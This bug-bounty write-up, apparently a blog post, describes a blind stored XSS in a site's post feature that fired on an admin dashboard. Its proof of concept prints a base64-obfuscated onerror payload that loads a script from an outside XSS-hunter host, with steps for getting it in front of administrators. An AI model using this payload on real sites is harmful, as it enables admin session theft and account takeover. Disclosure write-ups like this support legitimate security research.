.png)
1 year ago
69 BOOK THIS SPACE FOR AD
ARTICLE ADDescription:
The vulnerability was a blind stored cross-site scripting (XSS) attack. The attacker could inject malicious code into the application, which would be stored in the database and executed admin page dashboard (admin.redacted.com).
Proof of concept:
1. Login to your account on redacted.com
2. And create Post Page
3. and filled title and Post body with Blind XSS payload
*in this case i use xsshunter payload.
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veTEueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== onerror=eval(atob(this.id))>"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veTEueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==>4. now publish the Post.
5. Now Login to other account and navigate to url post, and report the content.
After 3 day my Payload fire on admin.redacted.com When administrator viewed my report content.
the team rewarded me with $2000 after 8 day i submited the report.
Impact:
An attacker exploiting this vulnerability could gain access to sensitive information, compromise the admin panel, and potentially take control of the application. The attacker could also use the stolen admin session cookies to access the admin panel and perform actions on behalf of the admin.
Follow me on Twitter: https://twitter.com/feribytex
Bengali (Bangladesh) · 
English (United States) ·